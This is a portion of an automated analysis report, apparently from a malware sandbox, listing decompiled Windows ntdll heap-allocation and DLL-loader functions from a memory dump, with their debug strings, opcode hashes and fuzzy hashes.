						if(_t149 >  *((intOrPtr*)(_t181 + 0x78))) {
							goto L44;
						}
						__eflags = _t89 & 0x00000001;
						if((_t89 & 0x00000001) != 0) {
							_t178 =  *(_t182 - 0x28);
						} else {
							E00FEEEF0( *((intOrPtr*)(_t181 + 0xc8)));
							 *((char*)(_t182 - 0x1d)) = 1;
							_t178 =  *(_t182 - 0x28) | 0x00000001;
							 *(_t182 - 0x3c) =  *(_t182 - 0x28) | 0x00000001;
						}
						E01094496(_t181, 0);
						_t177 = L00FF4620(_t181, _t181, _t178,  *(_t182 + 8));
						 *(_t182 - 0x24) = _t177;
						_t173 = 1;
						E010949A4(_t181);
						__eflags = _t177;
						if(_t177 == 0) {
							goto L49;
						} else {
							_t177 = _t177 + 0xfffffff8;
							__eflags =  *((char*)(_t177 + 7)) - 5;
							if( *((char*)(_t177 + 7)) == 5) {
								_t177 = _t177 - (( *(_t177 + 6) & 0x000000ff) << 3);
								__eflags = _t177;
							}
							_t154 = _t177;
							 *(_t182 - 0x40) = _t177;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *(_t177 + 3) - (_t154[0] ^ _t154[0] ^  *_t154);
								if(__eflags != 0) {
									_push(_t154);
									_t173 = _t177;
									E0108FA2B(0, _t181, _t177, _t177, _t181, __eflags);
								}
							}
							__eflags =  *(_t177 + 2) & 0x00000002;
							if(( *(_t177 + 2) & 0x00000002) == 0) {
								_t101 =  *(_t177 + 3);
								 *(_t182 - 0x29) = _t101;
								_t102 = _t101 & 0x000000ff;
							} else {
								_t130 = E00FD1F5B(_t177);
								 *((intOrPtr*)(_t182 - 0x30)) = _t130;
								__eflags =  *(_t181 + 0x40) & 0x08000000;
								if(( *(_t181 + 0x40) & 0x08000000) == 0) {
									 *_t130 = 0;
								} else {
									_t131 = E010016C7(1, _t173);
									_t165 =  *((intOrPtr*)(_t182 - 0x30));
									 *_t165 = _t131;
									_t130 = _t165;
								}
								_t102 =  *(_t130 + 2) & 0x0000ffff;
							}
							 *(_t182 - 0x34) = _t102;
							 *(_t182 - 0x28) = _t102;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *(_t177 + 3) =  *(_t177 + 2) ^  *(_t177 + 1) ^  *_t177;
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *_t177;
							}
							__eflags =  *(_t181 + 0x40) & 0x20000000;
							if(( *(_t181 + 0x40) & 0x20000000) != 0) {
								__eflags = 0;
								E01094496(_t181, 0);
							}
							__eflags =  *(_t182 - 0x24) -  *0x10c6360; // 0x0
							_t104 =  *[fs:0x30];
							if(__eflags != 0) {
								_t105 =  *(_t104 + 0x68);
								 *(_t182 - 0x4c) = _t105;
								__eflags = _t105 & 0x00000800;
								if((_t105 & 0x00000800) == 0) {
									goto L49;
								}
								_t106 =  *(_t182 - 0x34);
								__eflags = _t106;
								if(_t106 == 0) {
									goto L49;
								}
								__eflags = _t106 -  *0x10c6364; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								__eflags =  *((intOrPtr*)(_t181 + 0x7c)) -  *0x10c6366; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								_t108 =  *[fs:0x30];
								__eflags =  *(_t108 + 0xc);
								if( *(_t108 + 0xc) == 0) {
									_push("HEAP: ");
									E00FDB150();
								} else {
									E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E0107D455(_t181,  *(_t182 - 0x28)));
								_push( *(_t182 + 8));
								E00FDB150("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t182 - 0x24));
								goto L34;
							} else {
								__eflags =  *(_t104 + 0xc);
								if( *(_t104 + 0xc) == 0) {
									_push("HEAP: ");
									E00FDB150();
								} else {
									E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t182 + 8));
								E00FDB150("Just allocated block at %p for %Ix bytes\n",  *0x10c6360);
								L34:
								_t112 =  *[fs:0x30];
								__eflags =  *((char*)(_t112 + 2));
								if( *((char*)(_t112 + 2)) != 0) {
									 *0x10c6378 = 1;
									 *0x10c60c0 = 0;
									asm("int3");
									 *0x10c6378 = 0;
								}
								goto L49;
							}
						}
					}
				} else {
					_t181 =  *0x10c5708; // 0x0
					 *0x10cb1e0(__ecx, __edx,  *(_t182 + 8));
					 *_t181();
					L50:
					return E0102D130(0, _t177, _t181);
				}
			}





















                    0x01092d82
                    0x01092d84
                    0x01092d89
                    0x01092d8e
                    0x01092d90
                    0x01092d92
                    0x01092d97
                    0x01092d9a
                    0x01092da4
                    0x01092dc0
                    0x01092dc3
                    0x01092dd1
                    0x01092dd6
                    0x01092dd8
                    0x010930a7
                    0x010930a7
                    0x010930aa
                    0x010930aa
                    0x010930ad
                    0x010930b4
                    0x00000000
                    0x010930b9
                    0x01092de3
                    0x01092de8
                    0x01092deb
                    0x01092dee
                    0x01092df1
                    0x01092df3
                    0x01092dfb
                    0x01092dfb
                    0x01092df5
                    0x01092df5
                    0x01092df5
                    0x01092e04
                    0x01092e0a
                    0x01092e0d
                    0x01092e11
                    0x01092e11
                    0x01092e12
                    0x01092e15
                    0x01092e18
                    0x01092e1a
                    0x01093027
                    0x01093027
                    0x0109302d
                    0x01093030
                    0x0109304f
                    0x01093054
                    0x01093032
                    0x01093047
                    0x0109304c
                    0x0109305a
                    0x01093063
                    0x00000000
                    0x01092e20
                    0x01092e20
                    0x01092e23
                    0x00000000
                    0x00000000
                    0x01092e29
                    0x01092e2b
                    0x01092e47
                    0x01092e2d
                    0x01092e33
                    0x01092e38
                    0x01092e3f
                    0x01092e42
                    0x01092e42
                    0x01092e4e
                    0x01092e5d
                    0x01092e5f
                    0x01092e62
                    0x01092e66
                    0x01092e6b
                    0x01092e6d
                    0x00000000
                    0x01092e73
                    0x01092e73
                    0x01092e76
                    0x01092e7a
                    0x01092e83
                    0x01092e83
                    0x01092e83
                    0x01092e85
                    0x01092e87
                    0x01092e8a
                    0x01092e8d
                    0x01092e92
                    0x01092e9c
                    0x01092e9f
                    0x01092ea1
                    0x01092ea2
                    0x01092ea6
                    0x01092ea6
                    0x01092e9f
                    0x01092eab
                    0x01092eaf
                    0x01092edf
                    0x01092ee2
                    0x01092ee5
                    0x01092eb1
                    0x01092eb3
                    0x01092eb8
                    0x01092ebd
                    0x01092ec4
                    0x01092ed6
                    0x01092ec6
                    0x01092ec7
                    0x01092ecc
                    0x01092ecf
                    0x01092ed2
                    0x01092ed2
                    0x01092ed9
                    0x01092ed9
                    0x01092ee8
                    0x01092eeb
                    0x01092eef
                    0x01092ef2
                    0x01092efe
                    0x01092f04
                    0x01092f04
                    0x01092f04
                    0x01092f06
                    0x01092f0d
                    0x01092f0f
                    0x01092f13
                    0x01092f13
                    0x01092f1b
                    0x01092f21
                    0x01092f27
                    0x01092f95
                    0x01092f98
                    0x01092f9b
                    0x01092fa0
                    0x00000000
                    0x00000000
                    0x01092fa6
                    0x01092fa9
                    0x01092fac
                    0x00000000
                    0x00000000
                    0x01092fb2
                    0x01092fb9
                    0x00000000
                    0x00000000
                    0x01092fc3
                    0x01092fca
                    0x00000000
                    0x00000000
                    0x01092fd0
                    0x01092fd6
                    0x01092fd9
                    0x01092ff8
                    0x01092ffd
                    0x01092fdb
                    0x01092ff0
                    0x01092ff5
                    0x0109300e
                    0x0109300f
                    0x0109301a
                    0x00000000
                    0x01092f29
                    0x01092f29
                    0x01092f2c
                    0x01092f4b
                    0x01092f50
                    0x01092f2e
                    0x01092f43
                    0x01092f48
                    0x01092f56
                    0x01092f64
                    0x01092f6c
                    0x01092f6c
                    0x01092f72
                    0x01092f76
                    0x01092f7c
                    0x01092f83
                    0x01092f89
                    0x01092f8a
                    0x01092f8a
                    0x00000000
                    0x01092f76
                    0x01092f27
                    0x01092e6d
                    0x01092da6
                    0x01092dab
                    0x01092db3
                    0x01092db9
                    0x010930bc
                    0x010930c1
                    0x010930c1

                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                    • API String ID: 0-1745908468
                    • Opcode ID: 2d395a1e164cd45c93c3e98bcb53125fd985771b780a7f0f39e2819561ea4860
                    • Instruction ID: aa1e5369e37e4bf4514e0330afe26ef0e49cf8f8f06e8ffcfbde9d61fb20e29b
                    • Opcode Fuzzy Hash: 2d395a1e164cd45c93c3e98bcb53125fd985771b780a7f0f39e2819561ea4860
                    • Instruction Fuzzy Hash: AB91CE31500641EFDF22DF68C865AADBBF2BF89710F18805DF585AB392C73A9941EB01
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00FE3D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                    Download Yara Rule
                    Strings
                    • Kernel-MUI-Number-Allowed, xrefs: 00FE3D8C
                    • Kernel-MUI-Language-Disallowed, xrefs: 00FE3E97
                    • WindowsExcludedProcs, xrefs: 00FE3D6F
                    • Kernel-MUI-Language-Allowed, xrefs: 00FE3DC0
                    • Kernel-MUI-Language-SKU, xrefs: 00FE3F70
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                    • API String ID: 0-258546922
                    • Opcode ID: e3dd4f549cc56982b0c7a5d235401962898c6715e814f2479d2f6e1023d1bd38
                    • Instruction ID: 9c5e0dae7a493bfc54ffeebdc16f4cc45b41edee1427c9878bb3ec8a2551d986
                    • Opcode Fuzzy Hash: e3dd4f549cc56982b0c7a5d235401962898c6715e814f2479d2f6e1023d1bd38
                    • Instruction Fuzzy Hash: BEF17B72D00259EFCB11DF99C984AEEBBB9FF48750F1441AAE505E7251D734AE00EBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00FD40E1, Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                    • API String ID: 0-188067316
                    • Opcode ID: 545dc955dfbe82e75d40c05a7a816925b379ba1967284d0b9b0d1b5e2fff4e06
                    • Instruction ID: 13995e2c14d09bc4d4118a52332fd0709b1415f30fbc948cbf25883a4e892d44
                    • Opcode Fuzzy Hash: 545dc955dfbe82e75d40c05a7a816925b379ba1967284d0b9b0d1b5e2fff4e06
                    • Instruction Fuzzy Hash: 6C012832109241DED22A9B69E81EF9277F8DB81B30F1D806EF00497796CFAD9440EA11
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00FFA830, Relevance: 5.4, Strings: 4, Instructions: 350COMMON
                    Download Yara Rule
                    Strings
                    • HEAP: , xrefs: 010422E6, 010423F6
                    • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 010422F3
                    • HEAP[%wZ]: , xrefs: 010422D7, 010423E7
                    • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 01042403
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                    • API String ID: 0-1657114761
                    • Opcode ID: 501a617089cff69741f9831d9356d4de7b266fc2f357550431ec79dddacae3cb
                    • Instruction ID: 182b054e0c33e5c2da4a5c6b242c366f2b12b3787ee63f2e1cbe148ced47bc1a
                    • Opcode Fuzzy Hash: 501a617089cff69741f9831d9356d4de7b266fc2f357550431ec79dddacae3cb
                    • Instruction Fuzzy Hash: 56D1F4B0A00209DFDB29CF28C4907BAB7F1FF48310F158169E99A9B355E374E845EB52
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00FFA229, Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                    • API String ID: 2994545307-2586055223
                    • Opcode ID: 31e7db8cdf1b79c7d300b232e20d52570a39229b626ce20bc4db89dc6552a4f8
                    • Instruction ID: f1491240e9f149b7c23bf3a15faf0a5210aefdea1281a0b2475ebf5df8e6fecf
                    • Opcode Fuzzy Hash: 31e7db8cdf1b79c7d300b232e20d52570a39229b626ce20bc4db89dc6552a4f8
                    • Instruction Fuzzy Hash: B451F6B23046859FD712EB68CC45F7777E9EF84B10F1904A8FA958B2A2D734E840D762
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01008E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                    Download Yara Rule
                    Strings
                    • Querying the active activation context failed with status 0x%08lx, xrefs: 01049357
                    • minkernel\ntdll\ldrsnap.c, xrefs: 0104933B, 01049367
                    • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0104932A
                    • LdrpFindDllActivationContext, xrefs: 01049331, 0104935D
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                    • API String ID: 0-3779518884
                    • Opcode ID: 434a0139c6398939785ac1e4b8081f309d8c6b39de31bbcc8d2e6ed737981f33
                    • Instruction ID: 04daf241ba1c5a33ed428ef2bbad971964c94eb2825118e2a3908e16484cc131
                    • Opcode Fuzzy Hash: 434a0139c6398939785ac1e4b8081f309d8c6b39de31bbcc8d2e6ed737981f33
                    • Instruction Fuzzy Hash: A341D731E003959FFB77AB1C8889A7A76E4BB05358F05C1BBE9C4571D2E774AD808781
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010949A4, Relevance: 5.1, Strings: 4, Instructions: 114COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                    • API String ID: 2994545307-336120773
                    • Opcode ID: 5a0dc1d7540e58f39262058263b18514500ab89de7ba35bd70cef50ff3524a2f
                    • Instruction ID: 05ecbe6fa3b4bd49d528f079847e3bcd30cc43b3fa7c40ebf1dbb2be330e43ea
                    • Opcode Fuzzy Hash: 5a0dc1d7540e58f39262058263b18514500ab89de7ba35bd70cef50ff3524a2f
                    • Instruction Fuzzy Hash: F1314431200100EFDB21DB58C9A9FAB77E9FF04720F19419AF485DB2A1D778E841EB69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00FF99BF, Relevance: 4.3, Strings: 3, Instructions: 572COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                    • API String ID: 0-3178619729
                    • Opcode ID: 85b9b39e4019a85317540404d8f69000d7a776e0a3de2b5615da64884a78fb3c
                    • Instruction ID: b632fb6e83a7e4bcf74ca3ccfeaced21ba176cf9d70425576f929e22a4d168e4
                    • Opcode Fuzzy Hash: 85b9b39e4019a85317540404d8f69000d7a776e0a3de2b5615da64884a78fb3c
                    • Instruction Fuzzy Hash: A82225B0600205DFEB25CF28C895BBABBF5EF44704F1885ADE5858B356D779E881CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00FFB477, Relevance: 4.2, Strings: 3, Instructions: 405COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                    • API String ID: 0-4253913091
                    • Opcode ID: ebf42e2a214a599d851761db74989cb86861b0203ec412075ee6683bd08b4cce
                    • Instruction ID: 02b2a2e68353d21396f8d786634823dc107df9b56d9185813a0054c27541f07c
                    • Opcode Fuzzy Hash: ebf42e2a214a599d851761db74989cb86861b0203ec412075ee6683bd08b4cce
                    • Instruction Fuzzy Hash: 1CE19B71B0020ADFDB19DF68D894BBAB7B5FF44304F2881A9E5429B3A1D734E941DB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00FE8794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                    Download Yara Rule
                    Strings
                    • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01039C18
                    • minkernel\ntdll\ldrsnap.c, xrefs: 01039C28
                    • LdrpDoPostSnapWork, xrefs: 01039C1E
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                    • API String ID: 2994545307-1948996284
                    • Opcode ID: 08ad88ea8a83b2fb47bb0d1f3353df54dd782f790af6894ec78fa0313c6bbf9b
                    • Instruction ID: 0a8306dfb661583f97a6a42fe70486e6a184bf241f2651c1ad3b8efb3dc4a01c
                    • Opcode Fuzzy Hash: 08ad88ea8a83b2fb47bb0d1f3353df54dd782f790af6894ec78fa0313c6bbf9b
                    • Instruction Fuzzy Hash: 6D911431E0025ADFDF18EF5AC881ABA73B5FF84354B544169EC49AB141DB30EE02EB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0100AC7B, Relevance: 4.0, Strings: 3, Instructions: 205COMMON
                    Download Yara Rule
                    Strings
                    • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0104A0CD
                    • HEAP: , xrefs: 0104A0BA
                    • HEAP[%wZ]: , xrefs: 0104A0AD
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                    • API String ID: 0-1340214556
                    • Opcode ID: 33b709ce38b1d1adb1c39281133922d23882a30f0ca6cb0ea907bdc0fb264e17
                    • Instruction ID: a461d0670ca01679c21baf65b07cab2c8d8da9fa9915fe44f2110457aea3082e
                    • Opcode Fuzzy Hash: 33b709ce38b1d1adb1c39281133922d23882a30f0ca6cb0ea907bdc0fb264e17
                    • Instruction Fuzzy Hash: 9F81C371344784EFE727DB68C894FAABBF8EF08714F0441A5E5928B692D778E940DB10
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00FFB73D, Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                    • API String ID: 0-1334570610
                    • Opcode ID: 0658c11645ccf308f44c8446ef284d2d650f9017be0dbab2496a0ec933974e4d
                    • Instruction ID: 2985f05f7af2a6e8c4888a6f4572e9602d5d1f4230d908d04cf16c475131f8c1
                    • Opcode Fuzzy Hash: 0658c11645ccf308f44c8446ef284d2d650f9017be0dbab2496a0ec933974e4d
                    • Instruction Fuzzy Hash: F761F571A00209DFDB18DF24C485B7ABBE5FF84314F24856EE9498F261D734E882EB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00FE7E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                    Download Yara Rule
                    Strings
                    • minkernel\ntdll\ldrmap.c, xrefs: 010398A2
                    • LdrpCompleteMapModule, xrefs: 01039898
                    • Could not validate the crypto signature for DLL %wZ, xrefs: 01039891
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                    • API String ID: 0-1676968949
                    • Opcode ID: 40bc724e19e0d462e821e649d3674cc5f7afda365b2809d892d35fcf4eda6aa4
                    • Instruction ID: 1a9e7492753c0b6b08b1622dd925922978568df104e60b76b92e170c2310ac74
                    • Opcode Fuzzy Hash: 40bc724e19e0d462e821e649d3674cc5f7afda365b2809d892d35fcf4eda6aa4
                    • Instruction Fuzzy Hash: FD510331A08785DBE721EF5DC844B6ABBE4EF80724F140595E9919B3D1C774ED00EB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010823E3, Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                    Download Yara Rule
                    Strings
                    • Heap block at %p modified at %p past requested size of %Ix, xrefs: 0108256F
                    • HEAP: , xrefs: 0108255C
                    • HEAP[%wZ]: , xrefs: 0108254F
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                    • API String ID: 0-3815128232
                    • Opcode ID: c5c40b2231f576d30bcdfe466fcde2f17545c758b554a823d96e57a042b0f144
                    • Instruction ID: 3faa08984bd6cda9838cf6127c07c108a4aabac0338e08756f344c39fdee7889
                    • Opcode Fuzzy Hash: c5c40b2231f576d30bcdfe466fcde2f17545c758b554a823d96e57a042b0f144
                    • Instruction Fuzzy Hash: D1511634108250CEE3B5EF1EC8547767BF1EB44744F55889AE9C28B285DA3AD847DB31
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00FDE620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                    Download Yara Rule
                    Strings
                    • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 00FDE68C
                    • @, xrefs: 00FDE6C0
                    • InstallLanguageFallback, xrefs: 00FDE6DB
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                    • API String ID: 0-1757540487
                    • Opcode ID: e7f61d340506b0388cee6939d356bfbf652fd51b0613940232fcd06c902b3aae
                    • Instruction ID: 63509863e2c23ac42ef7d35cca428e64f2b1063d8b1a8e196f42925befb06bed
                    • Opcode Fuzzy Hash: e7f61d340506b0388cee6939d356bfbf652fd51b0613940232fcd06c902b3aae
                    • Instruction Fuzzy Hash: F551B3726043459BD754DF24C840AABB3E8BF88718F05096EF995D7250FB34D904D7A2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00FFB8E4, Relevance: 3.8, Strings: 3, Instructions: 69COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                    • API String ID: 0-2558761708
                    • Opcode ID: 205a0f36c21593c6141043897acc30b8aa005f472dcaa8ea4bc806606f071ccb
                    • Instruction ID: 3bd0743774260a685120a7cf52b74937a6c4a0bd1b56523dc4dbe671c5afcc3f
                    • Opcode Fuzzy Hash: 205a0f36c21593c6141043897acc30b8aa005f472dcaa8ea4bc806606f071ccb
                    • Instruction Fuzzy Hash: 0F11D33170410A9FDB29DB15C895B35B3AAEF80721F29812EF24ACB365D7B4D841FB45
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0109E539, Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: `$`
                    • API String ID: 0-197956300
                    • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                    • Instruction ID: b6c1a438dbf5dee5dbaae4631bfb2b0428e3fe248152ed4b7c2654f21ed3555e
                    • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                    • Instruction Fuzzy Hash: 8B91CF312043429FEB64CE29C851B5BBBE5BF88714F14896DF6D9CB280E774E904DB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010551BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID: Legacy$UEFI
                    • API String ID: 2994545307-634100481
                    • Opcode ID: 208b64a003f2621cf78bb788cee6972270112995080e15147faf4e281953319c
                    • Instruction ID: 60dc2d45e9cd6c4165df807220a6fec2ad784d6c48793080f0fa9b0bf071f130
                    • Opcode Fuzzy Hash: 208b64a003f2621cf78bb788cee6972270112995080e15147faf4e281953319c
                    • Instruction Fuzzy Hash: E9515E71A006099FDB54DFA9CC50AAEBBF4FF48740F14806DEA89EB252D7719940CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00FDB171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID: _vswprintf_s
                    • String ID:
                    • API String ID: 677850445-0
                    • Opcode ID: 37a1e937428dce4f965e1373515b179136dc0bb4ca7d8fa6bbc072b44747c974
                    • Instruction ID: bb187c1c6cd820aaac2ac6aac6263cc88b4a927cef0c960f22188244b55d0189
                    • Opcode Fuzzy Hash: 37a1e937428dce4f965e1373515b179136dc0bb4ca7d8fa6bbc072b44747c974
                    • Instruction Fuzzy Hash: B151E171D0025A8EDB32CF68C844BAEBBF5BF85710F2041AED899EB282D7754945CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00FFB944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                    Download Yara Rule
                    APIs
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FFB9A5
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID:
                    • API String ID: 885266447-0
                    • Opcode ID: f0e636f3c05fcc20fcc8f2f16ad5cd2e2b8905c3cdebabc1fd06e035dfe8334d
                    • Instruction ID: ce26e579fae05d8213f95804f70e9369006722d0aa13ffaaa3ec418f79cb68fb
                    • Opcode Fuzzy Hash: f0e636f3c05fcc20fcc8f2f16ad5cd2e2b8905c3cdebabc1fd06e035dfe8334d
                    • Instruction Fuzzy Hash: 49515B71A08349CFC720DF28C48092ABBE5BF88710F14896EFA8587364D775EC40DB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01002581, Relevance: 1.6, Strings: 1, Instructions: 329COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: PATH
                    • API String ID: 0-1036084923
                    • Opcode ID: 2b192ee70f00a65816bf375ddfb21aae1d66be1eba028a6bb7b2e31c8a4fd935
